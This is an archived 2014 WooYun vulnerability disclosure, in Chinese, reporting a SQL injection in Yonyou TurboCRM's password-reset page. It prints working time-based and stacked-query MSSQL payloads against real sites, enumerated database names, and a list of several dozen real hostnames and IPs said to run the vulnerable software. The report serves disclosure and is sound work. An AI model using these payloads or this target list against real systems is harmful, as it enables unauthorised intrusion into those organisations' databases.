乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-04: 细节已通知厂商并且等待厂商处理中 2014-06-05: 厂商已经确认,细节仅向厂商公开 2014-06-08: 细节向第三方安全合作伙伴开放 2014-07-30: 细节向核心白帽子及相关领域专家公开 2014-08-09: 细节向普通白帽子公开 2014-08-19: 细节向实习白帽子公开 2014-09-02: 细节向公众公开
用友某通用系统注入
用友TurboCRM存在通用sql注入
http://www.qinyuancrm.com/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds
loginname参数存在mssql timebased盲注
Place: GETParameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-----
[*] master[*] model[*] msdb[*] tempdb[*] turbocrm60[*] UFDATA_100_2012[*] UFMeta_100[*] UFSystem
然后我去官方的crm去看了下,同样存在
http://prm.ufida.com.cn/login/forgetpswd.php?orgcode=1&loginname=dsdfsfds Place: GETParameter: loginname Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: orgcode=1&loginname=dsdfsfds'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: orgcode=1&loginname=dsdfsfds' WAITFOR DELAY '0:0:5'-----web server operating system: Windowsweb application technology: PHP 5.2.10, Apache 2.2.13back-end DBMS: Microsoft SQL Server 2008
我在百度搜索了下,整理出了以下使用这套crm的网站,title:用友TurboCRM
218.94.82.23prm.ufida.com.cncrm.landwind.com.cncrm.szclou.comhttp://yindajituan.gicp.net:8888182.135.191.86111.40.0.242:9091222.171.32.36:9091219.90.119.35:8081180.168.98.94:8088prm.yonyou.comwww.kdlian.com:8001prm.chanjet.comqinyuancrm.comkfdq369.gicp.net220.113.5.194218.84.134.162:8088turbocrm.yofc.comcrm.elfa.com.cncrm.pearmain.cnnc.shineroad.comcrm.westernpower.cncrm7.abgroup.cncrm.transn.netzh4433.vicp.net218.108.86.226crm.yiwenkeji.com:8080218.95.66.88:9036crm.digisystem.com.cn:8080crm.shineroad.comcrm.siweidg.com222.41.174.190:8088117.36.76.254:8080hq.longmanschools.com.cn:808059.50.33.86:9000182.135.191.87crm.szclou.com:808858.220.225.28:8080
.
危害等级:高
漏洞Rank:15
确认时间:2014-06-05 13:55
将转给产品部门确认,感谢白帽子
暂无